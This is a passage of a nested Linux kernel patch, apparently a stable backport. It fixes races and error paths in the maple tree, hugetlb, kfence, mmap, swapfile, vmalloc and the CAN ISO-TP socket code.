++	if (!pivots)
++		return 0;
++
+ 	if (type == maple_arange_64)
+ 		return ma_meta_end(node, type);
+ 
+@@ -1429,6 +1489,9 @@ static inline unsigned char mas_data_end(struct ma_state *mas)
+ 		return ma_meta_end(node, type);
+ 
+ 	pivots = ma_pivots(node, type);
++	if (unlikely(ma_dead_node(node)))
++		return 0;
++
+ 	offset = mt_pivots[type] - 1;
+ 	if (likely(!pivots[offset]))
+ 		return ma_meta_end(node, type);
+@@ -3654,10 +3717,9 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 		slot++;
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+-
++	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	/* swap the new root into the tree */
+ 	rcu_assign_pointer(mas->tree->ma_root, mte_mk_root(mas->node));
+-	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	return slot;
+ }
+ 
+@@ -3870,18 +3932,13 @@ static inline void *mtree_lookup_walk(struct ma_state *mas)
+ 		end = ma_data_end(node, type, pivots, max);
+ 		if (unlikely(ma_dead_node(node)))
+ 			goto dead_node;
+-
+-		if (pivots[offset] >= mas->index)
+-			goto next;
+-
+ 		do {
+-			offset++;
+-		} while ((offset < end) && (pivots[offset] < mas->index));
+-
+-		if (likely(offset > end))
+-			max = pivots[offset];
++			if (pivots[offset] >= mas->index) {
++				max = pivots[offset];
++				break;
++			}
++		} while (++offset < end);
+ 
+-next:
+ 		slots = ma_slots(node, type);
+ 		next = mt_slot(mas->tree, slots, offset);
+ 		if (unlikely(ma_dead_node(node)))
+@@ -4500,6 +4557,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 	node = mas_mn(mas);
+ 	slots = ma_slots(node, mt);
+ 	pivots = ma_pivots(node, mt);
++	if (unlikely(ma_dead_node(node)))
++		return 1;
++
+ 	mas->max = pivots[offset];
+ 	if (offset)
+ 		mas->min = pivots[offset - 1] + 1;
+@@ -4521,6 +4581,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
+ 		offset = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		if (offset)
+ 			mas->min = pivots[offset - 1] + 1;
+ 
+@@ -4569,6 +4632,7 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 	struct maple_enode *enode;
+ 	int level = 0;
+ 	unsigned char offset;
++	unsigned char node_end;
+ 	enum maple_type mt;
+ 	void __rcu **slots;
+ 
+@@ -4592,7 +4656,11 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		node = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+ 		pivots = ma_pivots(node, mt);
+-	} while (unlikely(offset == ma_data_end(node, mt, pivots, mas->max)));
++		node_end = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
++	} while (unlikely(offset == node_end));
+ 
+ 	slots = ma_slots(node, mt);
+ 	pivot = mas_safe_pivot(mas, pivots, ++offset, mt);
+@@ -4608,6 +4676,9 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		mt = mte_node_type(mas->node);
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		offset = 0;
+ 		pivot = pivots[0];
+ 	}
+@@ -4654,16 +4725,19 @@ static inline void *mas_next_nentry(struct ma_state *mas,
+ 		return NULL;
+ 	}
+ 
+-	pivots = ma_pivots(node, type);
+ 	slots = ma_slots(node, type);
++	pivots = ma_pivots(node, type);
++	count = ma_data_end(node, type, pivots, mas->max);
++	if (unlikely(ma_dead_node(node)))
++		return NULL;
++
+ 	mas->index = mas_safe_min(mas, pivots, mas->offset);
+-	if (ma_dead_node(node))
++	if (unlikely(ma_dead_node(node)))
+ 		return NULL;
+ 
+ 	if (mas->index > max)
+ 		return NULL;
+ 
+-	count = ma_data_end(node, type, pivots, mas->max);
+ 	if (mas->offset > count)
+ 		return NULL;
+ 
+@@ -4738,6 +4812,11 @@ static inline void *mas_next_entry(struct ma_state *mas, unsigned long limit)
+ 	unsigned long last;
+ 	enum maple_type mt;
+ 
++	if (mas->index > limit) {
++		mas->index = mas->last = limit;
++		mas_pause(mas);
++		return NULL;
++	}
+ 	last = mas->last;
+ retry:
+ 	offset = mas->offset;
+@@ -4811,6 +4890,11 @@ retry:
+ 
+ 	slots = ma_slots(mn, mt);
+ 	pivots = ma_pivots(mn, mt);
++	if (unlikely(ma_dead_node(mn))) {
++		mas_rewalk(mas, index);
++		goto retry;
++	}
++
+ 	if (offset == mt_pivots[mt])
+ 		pivot = mas->max;
+ 	else
+@@ -4844,6 +4928,11 @@ static inline void *mas_prev_entry(struct ma_state *mas, unsigned long min)
+ {
+ 	void *entry;
+ 
++	if (mas->index < min) {
++		mas->index = mas->last = min;
++		mas->node = MAS_NONE;
++		return NULL;
++	}
+ retry:
+ 	while (likely(!mas_is_none(mas))) {
+ 		entry = mas_prev_nentry(mas, min, mas->index);
+@@ -5389,24 +5478,26 @@ no_gap:
+ }
+ 
+ /*
+- * mas_dead_leaves() - Mark all leaves of a node as dead.
++ * mte_dead_leaves() - Mark all leaves of a node as dead.
+  * @mas: The maple state
+  * @slots: Pointer to the slot array
++ * @type: The maple node type
+  *
+  * Must hold the write lock.
+  *
+  * Return: The number of leaves marked as dead.
+  */
+ static inline
+-unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
++unsigned char mte_dead_leaves(struct maple_enode *enode, struct maple_tree *mt,
++			      void __rcu **slots)
+ {
+ 	struct maple_node *node;
+ 	enum maple_type type;
+ 	void *entry;
+ 	int offset;
+ 
+-	for (offset = 0; offset < mt_slot_count(mas->node); offset++) {
+-		entry = mas_slot_locked(mas, slots, offset);
++	for (offset = 0; offset < mt_slot_count(enode); offset++) {
++		entry = mt_slot(mt, slots, offset);
+ 		type = mte_node_type(entry);
+ 		node = mte_to_node(entry);
+ 		/* Use both node and type to catch LE & BE metadata */
+@@ -5414,7 +5505,6 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 			break;
+ 
+ 		mte_set_node_dead(entry);
+-		smp_wmb(); /* Needed for RCU */
+ 		node->type = type;
+ 		rcu_assign_pointer(slots[offset], node);
+ 	}
+@@ -5422,151 +5512,160 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 	return offset;
+ }
+ 
+-static void __rcu **mas_dead_walk(struct ma_state *mas, unsigned char offset)
++/**
++ * mte_dead_walk() - Walk down a dead tree to just before the leaves
++ * @enode: The maple encoded node
++ * @offset: The starting offset
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
++static void __rcu **mte_dead_walk(struct maple_enode **enode, unsigned char offset)
+ {
+ 	struct maple_node *node, *next;
+ 	void __rcu **slots = NULL;
+ 
+-	next = mas_mn(mas);
++	next = mte_to_node(*enode);
+ 	do {
+-		mas->node = ma_enode_ptr(next);
+-		node = mas_mn(mas);
++		*enode = ma_enode_ptr(next);
++		node = mte_to_node(*enode);
+ 		slots = ma_slots(node, node->type);
+-		next = mas_slot_locked(mas, slots, offset);
++		next = rcu_dereference_protected(slots[offset],
++					lock_is_held(&rcu_callback_map));
+ 		offset = 0;
+ 	} while (!ma_is_leaf(next->type));
+ 
+ 	return slots;
+ }
+ 
++/**
++ * mt_free_walk() - Walk & free a tree in the RCU callback context
++ * @head: The RCU head that's within the node.
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
+ static void mt_free_walk(struct rcu_head *head)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node, *start;
+-	struct maple_tree mt;
++	struct maple_enode *enode;
+ 	unsigned char offset;
+ 	enum maple_type type;
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+ 	node = container_of(head, struct maple_node, rcu);
+ 
+ 	if (ma_is_leaf(node->type))
+ 		goto free_leaf;
+ 
+-	mt_init_flags(&mt, node->ma_flags);
+-	mas_lock(&mas);
+ 	start = node;
+-	mas.node = mt_mk_node(node, node->type);
+-	slots = mas_dead_walk(&mas, 0);
+-	node = mas_mn(&mas);
++	enode = mt_mk_node(node, node->type);
++	slots = mte_dead_walk(&enode, 0);
++	node = mte_to_node(enode);
+ 	do {
+ 		mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
+-
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
+-		if ((offset < mt_slots[type]) && (slots[offset]))
+-			slots = mas_dead_walk(&mas, offset);
+-
+-		node = mas_mn(&mas);
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
++
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
++		if ((offset < mt_slots[type]) &&
++		    rcu_dereference_protected(slots[offset],
++					      lock_is_held(&rcu_callback_map)))
++			slots = mte_dead_walk(&enode, offset);
++		node = mte_to_node(enode);
+ 	} while ((node != start) || (node->slot_len < offset));
+ 
+ 	slots = ma_slots(node, node->type);
+ 	mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+ free_leaf:
+ 	mt_free_rcu(&node->rcu);
+ }
+ 
+-static inline void __rcu **mas_destroy_descend(struct ma_state *mas,
+-			struct maple_enode *prev, unsigned char offset)
++static inline void __rcu **mte_destroy_descend(struct maple_enode **enode,
++	struct maple_tree *mt, struct maple_enode *prev, unsigned char offset)
+ {
+ 	struct maple_node *node;
+-	struct maple_enode *next = mas->node;
++	struct maple_enode *next = *enode;
+ 	void __rcu **slots = NULL;
++	enum maple_type type;
++	unsigned char next_offset = 0;
+ 
+ 	do {
+-		mas->node = next;
+-		node = mas_mn(mas);
+-		slots = ma_slots(node, mte_node_type(mas->node));
+-		next = mas_slot_locked(mas, slots, 0);
++		*enode = next;
++		node = mte_to_node(*enode);
++		type = mte_node_type(*enode);
++		slots = ma_slots(node, type);
++		next = mt_slot_locked(mt, slots, next_offset);
+ 		if ((mte_dead_node(next)))
+-			next = mas_slot_locked(mas, slots, 1);
++			next = mt_slot_locked(mt, slots, ++next_offset);
+ 
+-		mte_set_node_dead(mas->node);
+-		node->type = mte_node_type(mas->node);
++		mte_set_node_dead(*enode);
++		node->type = type;
+ 		node->piv_parent = prev;
+ 		node->parent_slot = offset;
+-		offset = 0;
+-		prev = mas->node;
++		offset = next_offset;
++		next_offset = 0;
++		prev = *enode;
+ 	} while (!mte_is_leaf(next));
+ 
+ 	return slots;
+ }
+ 
+-static void mt_destroy_walk(struct maple_enode *enode, unsigned char ma_flags,
++static void mt_destroy_walk(struct maple_enode *enode, struct maple_tree *mt,
+ 			    bool free)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node = mte_to_node(enode);
+ 	struct maple_enode *start;
+-	struct maple_tree mt;
+-
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+-	if (mte_is_leaf(enode))
++	if (mte_is_leaf(enode)) {
++		node->type = mte_node_type(enode);
+ 		goto free_leaf;
++	}
+ 
+-	mt_init_flags(&mt, ma_flags);
+-	mas_lock(&mas);
+-
+-	mas.node = start = enode;
+-	slots = mas_destroy_descend(&mas, start, 0);
+-	node = mas_mn(&mas);
++	start = enode;
++	slots = mte_destroy_descend(&enode, mt, start, 0);
++	node = mte_to_node(enode); // Updated in the above call.
+ 	do {
+ 		enum maple_type type;
+ 		unsigned char offset;
+ 		struct maple_enode *parent, *tmp;
+ 
+-		node->slot_len = mas_dead_leaves(&mas, slots);
++		node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 		if (free)
+ 			mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
+ 
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
+ 		if (offset >= mt_slots[type])
+ 			goto next;
+ 
+-		tmp = mas_slot_locked(&mas, slots, offset);
++		tmp = mt_slot_locked(mt, slots, offset);
+ 		if (mte_node_type(tmp) && mte_to_node(tmp)) {
+-			parent = mas.node;
+-			mas.node = tmp;
+-			slots = mas_destroy_descend(&mas, parent, offset);
++			parent = enode;
++			enode = tmp;
++			slots = mte_destroy_descend(&enode, mt, parent, offset);
+ 		}
+ next:
+-		node = mas_mn(&mas);
+-	} while (start != mas.node);
++		node = mte_to_node(enode);
++	} while (start != enode);
+ 
+-	node = mas_mn(&mas);
+-	node->slot_len = mas_dead_leaves(&mas, slots);
++	node = mte_to_node(enode);
++	node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 	if (free)
+ 		mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+-
+ free_leaf:
+ 	if (free)
+ 		mt_free_rcu(&node->rcu);
++	else
++		mt_clear_meta(mt, node, node->type);
+ }
+ 
+ /*
+@@ -5582,15 +5681,18 @@ static inline void mte_destroy_walk(struct maple_enode *enode,
+ 	struct maple_node *node = mte_to_node(enode);
+ 
+ 	if (mt_in_rcu(mt)) {
+-		mt_destroy_walk(enode, mt->ma_flags, false);
++		mt_destroy_walk(enode, mt, false);
+ 		call_rcu(&node->rcu, mt_free_walk);
+ 	} else {
+-		mt_destroy_walk(enode, mt->ma_flags, true);
++		mt_destroy_walk(enode, mt, true);
+ 	}
+ }
+ 
+ static void mas_wr_store_setup(struct ma_wr_state *wr_mas)
+ {
++	if (unlikely(mas_is_paused(wr_mas->mas)))
++		mas_reset(wr_mas->mas);
++
+ 	if (!mas_is_start(wr_mas->mas)) {
+ 		if (mas_is_none(wr_mas->mas)) {
+ 			mas_reset(wr_mas->mas);
+@@ -5726,6 +5828,7 @@ int mas_preallocate(struct ma_state *mas, void *entry, gfp_t gfp)
+ void mas_destroy(struct ma_state *mas)
+ {
+ 	struct maple_alloc *node;
++	unsigned long total;
+ 
+ 	/*
+ 	 * When using mas_for_each() to insert an expected number of elements,
+@@ -5748,14 +5851,20 @@ void mas_destroy(struct ma_state *mas)
+ 	}
+ 	mas->mas_flags &= ~(MA_STATE_BULK|MA_STATE_PREALLOC);
+ 
+-	while (mas->alloc && !((unsigned long)mas->alloc & 0x1)) {
++	total = mas_allocated(mas);
++	while (total) {
+ 		node = mas->alloc;
+ 		mas->alloc = node->slot[0];
+-		if (node->node_count > 0)
+-			mt_free_bulk(node->node_count,
+-				     (void __rcu **)&node->slot[1]);
++		if (node->node_count > 1) {
++			size_t count = node->node_count - 1;
++
++			mt_free_bulk(count, (void __rcu **)&node->slot[1]);
++			total -= count;
++		}
+ 		kmem_cache_free(maple_node_cache, node);
++		total--;
+ 	}
++
+ 	mas->alloc = NULL;
+ }
+ EXPORT_SYMBOL_GPL(mas_destroy);
+@@ -5893,6 +6002,7 @@ void *mas_prev(struct ma_state *mas, unsigned long min)
+ 	if (!mas->index) {
+ 		/* Nothing comes before 0 */
+ 		mas->last = 0;
++		mas->node = MAS_NONE;
+ 		return NULL;
+ 	}
+ 
+@@ -5983,6 +6093,9 @@ void *mas_find(struct ma_state *mas, unsigned long max)
+ 		mas->index = ++mas->last;
+ 	}
+ 
++	if (unlikely(mas_is_none(mas)))
++		mas->node = MAS_START;
++
+ 	if (unlikely(mas_is_start(mas))) {
+ 		/* First run or continue */
+ 		void *entry;
+@@ -6594,11 +6707,11 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	while (likely(!ma_is_leaf(mt))) {
+ 		MT_BUG_ON(mas->tree, mte_dead_node(mas->node));
+ 		slots = ma_slots(mn, mt);
+-		pivots = ma_pivots(mn, mt);
+-		max = pivots[0];
+ 		entry = mas_slot(mas, slots, 0);
++		pivots = ma_pivots(mn, mt);
+ 		if (unlikely(ma_dead_node(mn)))
+ 			return NULL;
++		max = pivots[0];
+ 		mas->node = entry;
+ 		mn = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+@@ -6618,13 +6731,13 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	if (likely(entry))
+ 		return entry;
+ 
+-	pivots = ma_pivots(mn, mt);
+-	mas->index = pivots[0] + 1;
+ 	mas->offset = 1;
+ 	entry = mas_slot(mas, slots, 1);
++	pivots = ma_pivots(mn, mt);
+ 	if (unlikely(ma_dead_node(mn)))
+ 		return NULL;
+ 
++	mas->index = pivots[0] + 1;
+ 	if (mas->index > limit)
+ 		goto none;
+ 
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 52475c4262e45..d3ffa0fd49e57 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -5469,7 +5469,7 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		       struct page *pagecache_page, spinlock_t *ptl)
+ {
+ 	const bool unshare = flags & FAULT_FLAG_UNSHARE;
+-	pte_t pte;
++	pte_t pte = huge_ptep_get(ptep);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *old_page, *new_page;
+ 	int outside_reserve = 0;
+@@ -5480,6 +5480,17 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	VM_BUG_ON(unshare && (flags & FOLL_WRITE));
+ 	VM_BUG_ON(!unshare && !(flags & FOLL_WRITE));
+ 
++	/*
++	 * Never handle CoW for uffd-wp protected pages.  It should be only
++	 * handled when the uffd-wp protection is removed.
++	 *
++	 * Note that only the CoW optimization path (in hugetlb_no_page())
++	 * can trigger this, because hugetlb_fault() will always resolve
++	 * uffd-wp bit first.
++	 */
++	if (!unshare && huge_pte_uffd_wp(pte))
++		return 0;
++
+ 	/*
+ 	 * hugetlb does not support FOLL_FORCE-style write faults that keep the
+ 	 * PTE mapped R/O such as maybe_mkwrite() would do.
+@@ -5495,7 +5506,6 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		return 0;
+ 	}
+ 
+-	pte = huge_ptep_get(ptep);
+ 	old_page = pte_page(pte);
+ 
+ 	delayacct_wpcopy_start();
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index c3d04753806a2..a477b7fb8aa33 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -557,15 +557,11 @@ static unsigned long kfence_init_pool(void)
+ 	 * enters __slab_free() slow-path.
+ 	 */
+ 	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
+-		struct slab *slab = page_slab(&pages[i]);
++		struct slab *slab = page_slab(nth_page(pages, i));
+ 
+ 		if (!i || (i % 2))
+ 			continue;
+ 
+-		/* Verify we do not have a compound head page. */
+-		if (WARN_ON(compound_head(&pages[i]) != &pages[i]))
+-			return addr;
+-
+ 		__folio_set_slab(slab_folio(slab));
+ #ifdef CONFIG_MEMCG
+ 		slab->memcg_data = (unsigned long)&kfence_metadata[i / 2 - 1].objcg |
+@@ -598,12 +594,26 @@ static unsigned long kfence_init_pool(void)
+ 
+ 		/* Protect the right redzone. */
+ 		if (unlikely(!kfence_protect(addr + PAGE_SIZE)))
+-			return addr;
++			goto reset_slab;
+ 
+ 		addr += 2 * PAGE_SIZE;
+ 	}
+ 
+ 	return 0;
++
++reset_slab:
++	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
++		struct slab *slab = page_slab(nth_page(pages, i));
++
++		if (!i || (i % 2))
++			continue;
++#ifdef CONFIG_MEMCG
++		slab->memcg_data = 0;
++#endif
++		__folio_clear_slab(slab_folio(slab));
++	}
++
++	return addr;
+ }
+ 
+ static bool __init kfence_init_pool_early(void)
+@@ -633,16 +643,6 @@ static bool __init kfence_init_pool_early(void)
+ 	 * fails for the first page, and therefore expect addr==__kfence_pool in
+ 	 * most failure cases.
+ 	 */
+-	for (char *p = (char *)addr; p < __kfence_pool + KFENCE_POOL_SIZE; p += PAGE_SIZE) {
+-		struct slab *slab = virt_to_slab(p);
+-
+-		if (!slab)
+-			continue;
+-#ifdef CONFIG_MEMCG
+-		slab->memcg_data = 0;
+-#endif
+-		__folio_clear_slab(slab_folio(slab));
+-	}
+ 	memblock_free_late(__pa(addr), KFENCE_POOL_SIZE - (addr - (unsigned long)__kfence_pool));
+ 	__kfence_pool = NULL;
+ 	return false;
+diff --git a/mm/memory.c b/mm/memory.c
+index f6f93e5b6b023..747b7ea30f890 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3619,8 +3619,21 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct mmu_notifier_range range;
+ 
+-	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags))
++	/*
++	 * We need a reference to lock the folio because we don't hold
++	 * the PTL so a racing thread can remove the device-exclusive
++	 * entry and unmap it. If the folio is free the entry must
++	 * have been removed already. If it happens to have already
++	 * been re-allocated after being freed all we do is lock and
++	 * unlock it.
++	 */
++	if (!folio_try_get(folio))
++		return 0;
++
++	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags)) {
++		folio_put(folio);
+ 		return VM_FAULT_RETRY;
++	}
+ 	mmu_notifier_range_init_owner(&range, MMU_NOTIFY_EXCLUSIVE, 0, vma,
+ 				vma->vm_mm, vmf->address & PAGE_MASK,
+ 				(vmf->address & PAGE_MASK) + PAGE_SIZE, NULL);
+@@ -3633,6 +3646,7 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ 	folio_unlock(folio);
++	folio_put(folio);
+ 
+ 	mmu_notifier_invalidate_range_end(&range);
+ 	return 0;
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 1777148868494..fe1db604dc49e 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -2308,7 +2308,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	int count = 0;
+ 	int error = -ENOMEM;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+-	mt_init_flags(&mt_detach, MT_FLAGS_LOCK_EXTERN);
++	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+ 
+ 	if (mas_preallocate(mas, vma, GFP_KERNEL))
+@@ -3095,6 +3095,7 @@ void exit_mmap(struct mm_struct *mm)
+ 	 */
+ 	set_bit(MMF_OOM_SKIP, &mm->flags);
+ 	mmap_write_lock(mm);
++	mt_clear_in_rcu(&mm->mm_mt);
+ 	free_pgtables(&tlb, &mm->mm_mt, vma, FIRST_USER_ADDRESS,
+ 		      USER_PGTABLES_CEILING);
+ 	tlb_finish_mmu(&tlb);
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index b72908df52ac9..71db6d8a1ea30 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -679,6 +679,7 @@ static void __del_from_avail_list(struct swap_info_struct *p)
+ {
+ 	int nid;
+ 
++	assert_spin_locked(&p->lock);
+ 	for_each_node(nid)
+ 		plist_del(&p->avail_lists[nid], &swap_avail_heads[nid]);
+ }
+@@ -2428,8 +2429,8 @@ SYSCALL_DEFINE1(swapoff, const char __user *, specialfile)
+ 		spin_unlock(&swap_lock);
+ 		goto out_dput;
+ 	}
+-	del_from_avail_list(p);
+ 	spin_lock(&p->lock);
++	del_from_avail_list(p);
+ 	if (p->prio < 0) {
+ 		struct swap_info_struct *si = p;
+ 		int nid;
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index ccaa461998f3c..d606e53c650e5 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -3056,9 +3056,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
+ 	 * allocation request, free them via __vfree() if any.
+ 	 */
+ 	if (area->nr_pages != nr_small_pages) {
+-		warn_alloc(gfp_mask, NULL,
+-			"vmalloc error: size %lu, page order %u, failed to allocate pages",
+-			area->nr_pages * PAGE_SIZE, page_order);
++		/* vm_area_alloc_pages() can also fail due to a fatal signal */
++		if (!fatal_signal_pending(current))
++			warn_alloc(gfp_mask, NULL,
++				"vmalloc error: size %lu, page order %u, failed to allocate pages",
++				area->nr_pages * PAGE_SIZE, page_order);
+ 		goto fail;
+ 	}
+ 
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 9bc344851704e..5761d4ab839dd 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -119,7 +119,8 @@ enum {
+ 	ISOTP_WAIT_FIRST_FC,
+ 	ISOTP_WAIT_FC,
+ 	ISOTP_WAIT_DATA,
+-	ISOTP_SENDING
++	ISOTP_SENDING,
++	ISOTP_SHUTDOWN,
+ };
+ 
+ struct tpcon {
+@@ -880,8 +881,8 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+ 
+-	/* don't handle timeouts in IDLE state */
+-	if (so->tx.state == ISOTP_IDLE)
++	/* don't handle timeouts in IDLE or SHUTDOWN state */
++	if (so->tx.state == ISOTP_IDLE || so->tx.state == ISOTP_SHUTDOWN)
+ 		return HRTIMER_NORESTART;
+ 
+ 	/* we did not get any flow control or echo frame in time */
+@@ -918,7 +919,6 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct isotp_sock *so = isotp_sk(sk);
+-	u32 old_state = so->tx.state;
+ 	struct sk_buff *skb;
+ 	struct net_device *dev;
+ 	struct canfd_frame *cf;
+@@ -928,23 +928,24 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	int off;
+ 	int err;
+ 
+-	if (!so->bound)
++	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
++wait_free_buffer:
+ 	/* we do not support multiple buffers - for now */
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE ||
+-	    wq_has_sleeper(&so->wait)) {
+-		if (msg->msg_flags & MSG_DONTWAIT) {
+-			err = -EAGAIN;
+-			goto err_out;
+-		}
++	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
++		return -EAGAIN;
+ 
+-		/* wait for complete transmission of current pdu */
+-		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-		if (err)
+-			goto err_out;
++	/* wait for complete transmission of current pdu */
++	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	if (err)
++		goto err_event_drop;
+ 
+-		so->tx.state = ISOTP_SENDING;
++	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		if (so->tx.state == ISOTP_SHUTDOWN)
++			return -EADDRNOTAVAIL;
++
++		goto wait_free_buffer;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
+@@ -1074,7 +1075,9 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	if (wait_tx_done) {
+ 		/* wait for complete transmission of current pdu */
+-		wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 
+ 		if (sk->sk_err)
+ 			return -sk->sk_err;
+@@ -1082,13 +1085,15 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	return size;
+ 
++err_event_drop:
++	/* got signal: force tx state machine to be idle */
++	so->tx.state = ISOTP_IDLE;
++	hrtimer_cancel(&so->txfrtimer);
++	hrtimer_cancel(&so->txtimer);
+ err_out_drop:
+ 	/* drop this PDU and unlock a potential wait queue */
+-	old_state = ISOTP_IDLE;
+-err_out:
+-	so->tx.state = old_state;
+-	if (so->tx.state == ISOTP_IDLE)
+-		wake_up_interruptible(&so->wait);
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+ 	return err;
+ }
+@@ -1120,7 +1125,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	if (ret < 0)
+ 		goto out_err;
+ 
+-	sock_recv_timestamp(msg, sk, skb);
++	sock_recv_cmsgs(msg, sk, skb);
+ 
+ 	if (msg->msg_name) {
+ 		__sockaddr_check_size(ISOTP_MIN_NAMELEN);
+@@ -1150,10 +1155,12 @@ static int isotp_release(struct socket *sock)
+ 	net = sock_net(sk);
+ 
+ 	/* wait for complete transmission of current pdu */
+-	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	while (wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE) == 0 &&
++	       cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SHUTDOWN) != ISOTP_IDLE)
++		;
+ 
+ 	/* force state machines to be idle also when a signal occurred */
+-	so->tx.state = ISOTP_IDLE;
++	so->tx.state = ISOTP_SHUTDOWN;
+ 	so->rx.state = ISOTP_IDLE;
+ 
+ 	spin_lock(&isotp_notifier_lock);
+@@ -1608,6 +1615,21 @@ static int isotp_init(struct sock *sk)
+ 	return 0;
+ }
+ 
